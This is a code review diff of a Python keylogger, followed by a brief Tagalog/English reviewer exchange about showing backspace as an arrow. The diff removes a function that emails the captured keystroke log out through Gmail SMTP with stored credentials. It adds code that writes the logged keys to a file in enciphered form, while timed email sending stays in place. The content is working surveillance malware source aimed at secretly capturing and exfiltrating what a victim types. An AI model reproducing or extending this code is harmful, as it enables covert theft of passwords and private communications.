Keylogger/keylogger.py

```diff
@@ -1,115 +1,213 @@
+        if len(self.keys) >= KeyLogger.CONFIG["chars"]:
             self.write_file()
-            if current_time - self.last_email_time >= self.timer:
+            if (time.time() - self.last_email_time) >= self.interval:
                 self.send_email()
-                self.last_email_time = current_time
-
-    def write_file(self):
-        with open(self.file_path + self.extend + self.keys_information, "a") as f:
-            for key in self.keys:
-                k = str(key).replace("'", "")
-                if k == "Key.enter":
-                    f.write('\n')
-                elif k.find("Key") == -1:
-                    f.write(k)
-            self.keys = []
-
-    # This function will send the key_log.txt file to the email address you indicated.
-    def send_email(self):
-        fromaddr = self.email_address
-        toaddr = self.toaddr
-        msg = MIMEMultipart()
-        msg['From'] = fromaddr
-        msg['To'] = toaddr
-        msg['Subject'] = "Log File"
-        body = "Body_of_the_mail"
-        msg.attach(MIMEText(body, 'plain'))
-        filename = self.keys_information
-        attachment = open(self.file_path + self.extend + self.keys_information, 'rb')
-        p = MIMEBase('application', 'octet-stream')
-        p.set_payload((attachment).read())
-        encoders.encode_base64(p)
-        p.add_header('Content-Disposition', "attachment; filename= %s" % filename)
-        msg.attach(p)
-        s = smtplib.SMTP('smtp.gmail.com', 587)
-        s.starttls()
-        s.login(fromaddr, self.password)
-        text = msg.as_string()
-        s.sendmail(fromaddr, toaddr, text)
-        s.quit()
-    
-    
-    def on_release(self, key):
+
+    def write_file(self) -> None:
+        """
+        Write encrypted keys to the file.
+        """
+        with open(self.file_paths["recorded_keys"], "a+", encoding="utf-8") as file:
+            file.write(
+                (
+                    KeyLogger.CONFIG["delim"]
+                    if not KeyLogger.START
+                    else ""  # U+200B is a zero-width space
+                )
+                + cipher_string(
+                    "".join(map(self.translate_key, self.keys)),
+                    KeyLogger.CONFIG["offset"],
+                    KeyLogger.CONFIG["jumps"],
+                )
+            )
+        print("".join(map(self.translate_key, self.keys)))
+        self.keys.clear()
+
+        if not KeyLogger.START:
+            KeyLogger.START = True
+
+    def translate_key(self, key: Key) -> str:
+        """
+        Translate the KeyCode and return the string representation of it.
+
+        Args:
+            key (Key): The key to be translated
+        """
+        match key:
+            case Key.enter:
+                return "\n"
+            case Key.space:
+                return " "
+            case Key.backspace:
+                return "←"  # ? <- Needs review
```

Comment:
Goods lang kaya 'tong substitution ng backspace to `←`? O wag na i-track yung backspace? HAHAHAHA

Reply:
Goods 'to bro, mas ok kung may indication when the user used the backspace key din, Thanks thanks!